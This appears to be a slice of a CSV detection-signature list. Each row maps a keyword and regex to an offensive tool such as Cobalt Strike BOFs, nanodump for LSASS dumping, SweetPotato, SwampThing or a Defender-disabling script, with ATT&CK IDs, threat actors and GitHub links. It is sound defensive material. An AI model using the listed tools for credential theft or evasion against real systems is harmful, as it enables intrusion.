"*suspended_run *",".{0,1000}suspended_run\s.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","60678"
"*suspendresume.x64.*",".{0,1000}suspendresume\.x64\..{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","60679"
"*suspendresume.x86.*",".{0,1000}suspendresume\.x86\..{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","60680"
"*'svc_smuggling'*",".{0,1000}\'svc_smuggling\'.{0,1000}","offensive_tool_keyword","Tchopper","conduct Lateral Movement attack by leveraging unfiltered services display name to smuggle binaries as chunks into the target machine","T1021 - T1564","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/lawrenceamer/Tchopper","1","0","N/A","N/A","9","1","54","7","2021-06-14T08:27:31Z","2021-06-08T15:51:14Z","60681"
"*svc_stager.exe*",".{0,1000}svc_stager\.exe.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105  -  T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","60682"
"*SW2_GetSyscallNumber*",".{0,1000}SW2_GetSyscallNumber.{0,1000}","offensive_tool_keyword","cobaltstrike","Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF) via Syswhispers2","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Sh0ckFR/InlineWhispers2","1","1","N/A","N/A","10","10","185","28","2022-07-21T08:40:05Z","2021-11-16T12:47:35Z","60683"
"*SW2_GetSyscallNumber*",".{0,1000}SW2_GetSyscallNumber.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","60684"
"*SW2_HashSyscall*",".{0,1000}SW2_HashSyscall.{0,1000}","offensive_tool_keyword","cobaltstrike","Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF) via Syswhispers2","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Sh0ckFR/InlineWhispers2","1","1","N/A","N/A","10","10","185","28","2022-07-21T08:40:05Z","2021-11-16T12:47:35Z","60685"
"*SW2_PopulateSyscallList*",".{0,1000}SW2_PopulateSyscallList.{0,1000}","offensive_tool_keyword","cobaltstrike","Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF) via Syswhispers2","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Sh0ckFR/InlineWhispers2","1","1","N/A","N/A","10","10","185","28","2022-07-21T08:40:05Z","2021-11-16T12:47:35Z","60686"
"*SW2_PopulateSyscallList*",".{0,1000}SW2_PopulateSyscallList.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","60687"
"*SW2_RVA2VA*",".{0,1000}SW2_RVA2VA.{0,1000}","offensive_tool_keyword","cobaltstrike","Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF) via Syswhispers2","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Sh0ckFR/InlineWhispers2","1","1","N/A","N/A","10","10","185","28","2022-07-21T08:40:05Z","2021-11-16T12:47:35Z","60688"
"*SW2_RVA2VA*",".{0,1000}SW2_RVA2VA.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","60689"
"*SW3_GetSyscallAddress*",".{0,1000}SW3_GetSyscallAddress.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","60690"
"*Sw4mpf0x/PowerLurk*",".{0,1000}Sw4mpf0x\/PowerLurk.{0,1000}","offensive_tool_keyword","Powerlurk","PowerLurk is a PowerShell toolset for building malicious WMI Event Subsriptions","T1084 - T1059.001 - T1546.003 - T1053.005","TA0003 - TA0005 - TA0002 - TA0006","N/A","N/A","Persistence","https://github.com/Sw4mpf0x/PowerLurk","1","1","N/A","N/A","10","4","384","72","2016-07-25T22:19:22Z","2016-07-13T20:07:25Z","60691"
"*swagkarna/Defeat-Defender-V*",".{0,1000}swagkarna\/Defeat\-Defender\-V.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection  - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","1","N/A","N/A","10","10","1530","316","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z","60692"
"*swaks --to * --from * --header *Subject: * --body * --server *",".{0,1000}swaks\s\-\-to\s.{0,1000}\s\-\-from\s.{0,1000}\s\-\-header\s.{0,1000}Subject\:\s.{0,1000}\s\-\-body\s.{0,1000}\s\-\-server\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","60693"
"*SwampThing.exe*",".{0,1000}SwampThing\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","EDR Evasion - Combination of SwampThing - TikiTorch","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rkervella/CarbonMonoxide","1","1","N/A","N/A","10","10","25","10","2020-05-28T10:40:20Z","2020-05-15T09:32:25Z","60694"
"*SwampThing.exe*",".{0,1000}SwampThing\.exe.{0,1000}","offensive_tool_keyword","SwampThing","SwampThing lets you to spoof process command line args (x32/64). Essentially you create a process in a suspended state - rewrite the PEB - resume and finally revert the PEB. The end result is that logging infrastructure will record the fake command line args instead of the real ones","T1036.005 - T1564.002","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/SwampThing","1","1","N/A","N/A","N/A","10","1131","203","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z","60695"
"*SwampThing.pdb*",".{0,1000}SwampThing\.pdb.{0,1000}","offensive_tool_keyword","SwampThing","SwampThing lets you to spoof process command line args (x32/64). Essentially you create a process in a suspended state - rewrite the PEB - resume and finally revert the PEB. The end result is that logging infrastructure will record the fake command line args instead of the real ones","T1036.005 - T1564.002","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/SwampThing","1","1","N/A","N/A","N/A","10","1131","203","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z","60696"
"*SwampThing.sln*",".{0,1000}SwampThing\.sln.{0,1000}","offensive_tool_keyword","SwampThing","SwampThing lets you to spoof process command line args (x32/64). Essentially you create a process in a suspended state - rewrite the PEB - resume and finally revert the PEB. The end result is that logging infrastructure will record the fake command line args instead of the real ones","T1036.005 - T1564.002","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/SwampThing","1","1","N/A","N/A","N/A","10","1131","203","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z","60697"
"*SWbemServicesImplant*",".{0,1000}SWbemServicesImplant.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","60700"
"*SweetPotato by @_EthicalChaos_*",".{0,1000}SweetPotato\sby\s\@_EthicalChaos_.{0,1000}","offensive_tool_keyword","SweetPotato","Local Service to SYSTEM privilege escalation from Windows 7 to Windows 10 / Server 2019","T1548 - T1055","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/CCob/SweetPotato","1","0","N/A","N/A","10","10","1697","228","2024-09-04T17:09:30Z","2020-04-12T17:40:03Z","60701"
"*sweetpotato -p*",".{0,1000}sweetpotato\s\-p.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","60702"
"*SweetPotato.cna*",".{0,1000}SweetPotato\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Modified SweetPotato to work with CobaltStrike v4.0","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Tycx2ry/SweetPotato_CS","1","1","N/A","N/A","10","10","241","48","2020-04-30T14:27:20Z","2020-04-16T08:01:31Z","60703"
"*SweetPotato.csproj*",".{0,1000}SweetPotato\.csproj.{0,1000}","offensive_tool_keyword","cobaltstrike","Modified SweetPotato to work with CobaltStrike v4.0","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Tycx2ry/SweetPotato_CS","1","1","N/A","N/A","10","10","241","48","2020-04-30T14:27:20Z","2020-04-16T08:01:31Z","60704"
"*SweetPotato.exe*",".{0,1000}SweetPotato\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Modified SweetPotato to work with CobaltStrike v4.0","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Tycx2ry/SweetPotato_CS","1","1","N/A","N/A","10","10","241","48","2020-04-30T14:27:20Z","2020-04-16T08:01:31Z","60705"
"*SweetPotato.exe*",".{0,1000}SweetPotato\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","60706"
"*SweetPotato.exe*",".{0,1000}SweetPotato\.exe.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","60707"
